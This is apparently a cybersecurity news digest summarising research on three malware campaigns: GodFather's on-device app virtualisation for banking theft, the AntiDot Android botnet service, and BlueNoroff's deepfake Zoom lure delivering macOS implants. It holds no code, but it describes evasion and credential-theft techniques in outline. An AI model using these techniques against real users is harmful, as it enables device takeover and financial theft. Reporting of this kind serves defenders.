UPDATE: Godfather Android Trojan Uses Virtual Sandbox to Hijack Real Banking and Crypto Apps
The latest version of the GodFather Android trojan marks a serious escalation in mobile malware by deploying a full virtualization framework directly on infected devices. Unlike traditional banking trojans that rely on fake login screens or overlays, this version creates a contained virtual environment where actual copies of the user’s apps are run and monitored. Once the device is infected, Godfather scans for installed banking and cryptocurrency applications, builds a cache list of targets, and uses that list to spin up virtualized instances of those apps. When users try to open their banking app, they are unknowingly redirected to a fully functional version running in the sandbox. The user sees the real interface and performs genuine actions, unaware that everything they type, like logins, transactions, and entered credentials, is intercepted in real-time by the malware. This new technique is enabled by several open-source components, including Virtualapp, XposedInstaller, XposedBridge, and Xposed, which allow app virtualization and dynamic control over running apps. Godfather uses a host app that loads and executes the targeted applications inside a virtual filesystem. From there, attackers gain full visibility into user actions and can remotely alter app behavior during runtime, bypassing security checks or modifying responses. Because the virtualized apps are unaltered and fully functional, users have no visual cues that they are being manipulated. The malware further evades detection by modifying the ZIP structure of APK files and rewriting the Android Manifest layout to confuse static analysis tools. It continues to exploit Android’s accessibility services to gain necessary permissions, often tricking users through social engineering prompts. Zimperium researchers also observed the malware attempting to capture device lock screen credentials, including passwords, PINs, and unlock patterns. While attacks have been concentrated on Turkish financial institutions, the malware is equipped to target nearly 500 applications globally across finance, e-commerce, communication, and social platforms, making this an emerging threat with the potential for widespread damage.
AntiDot Android Botnet Grants Full Device Control Through Sophisticated MaaS Framework
AntiDot is a newly discovered Android botnet malware that combines a loader, packer, and command-and-control infrastructure into a single malware-as-a-service (MaaS) platform. Operated by a threat actor known as LARVA-398 and sold on underground forums like XSS, AntiDot is designed to give cybercriminals full remote access to infected devices. The malware is distributed through phishing campaigns and malicious ads, typically disguised as fake update apps. Once installed, it tricks users into granting accessibility permissions using a fake loading screen, then dynamically unpacks an encrypted payload that activates its botnet functions. With WebSocket-based C2 communication, AntiDot enables real-time control, including screen recording, SMS interception, and overlay attacks that mimic legitimate banking and crypto apps to steal credentials. So far, researchers have tracked over 3,700 infections across 273 targeted campaigns. The malware's control panel, built with MeteorJS, provides attackers with a live dashboard showing victim details and offering precise commands like “startVnc” for screen viewing and “overlay_pin” to capture device unlock credentials. AntiDot sets itself as the default SMS app to intercept messages and uses Android’s accessibility services to simulate user behavior while hiding notifications to stay undetected. It also employs heavy obfuscation, ZIP structure tampering, and Android Manifest manipulation to bypass security tools. Campaign identifiers follow structured naming conventions, highlighting a well-organized operation with a global reach. While some cybercriminals have criticized the developer for limited support and outdated compatibility, the malware’s ability to silently hijack user sessions, steal data, and control devices in real-time makes it a serious and growing threat in the mobile malware landscape.
North Korean Threat Actors Leverage Deepfakes and Zoom Impersonation to Deploy Sophisticated macOS Malware
The North Korean APT group BlueNoroff has executed a highly targeted macOS malware campaign that leverages deepfake technology and impersonation during Zoom meetings to compromise enterprise environments. According to Huntress, the operation began with the threat actors initiating contact via Telegram, posing as external business partners, and sending a fake Calendly link that redirected victims to a spoofed Zoom domain under their control. During the virtual meeting, victims were shown AI-generated deepfake videos impersonating senior executives from their organization to establish trust. A simulated microphone issue prompted the delivery of a malicious AppleScript file disguised as a Zoom extension. After parsing thousands of blank lines, the script appeared benign by opening a legitimate Zoom SDK webpage but executed a concealed command to download a secondary payload. The script also disabled bash history, checked for Rosetta 2 (installing it if necessary), and retrieved additional malware from attacker-controlled infrastructure. The malware payload consisted of several custom macOS implants, each designed for persistence, surveillance, and credential theft. Telegram 2, a Nim-based component signed with a valid Telegram certificate, served as the primary persistence mechanism. Root Troy V4, written in Go, provided command-and-control functionality, including remote code execution and payload management. InjectWithDyld functioned as a second-stage loader, decrypting implants using a password-derived AES key and performing process injection while wiping traces post-execution. XScreen (keyboardd) enabled continuous monitoring through keylogging, screen recording, and clipboard capture, while CryptoBot (airmond) targeted over 20 cryptocurrency wallet platforms, exfiltrating sensitive financial data. This campaign underscores a growing shift in APT operations targeting macOS environments with advanced social engineering and modular malware frameworks. The use of deepfakes in live interactions, combined with tailored payloads and stealthy execution methods, highlights the increasing sophistication of state-sponsored threat actors and the critical need for enterprise macOS defenses to evolve accordingly.
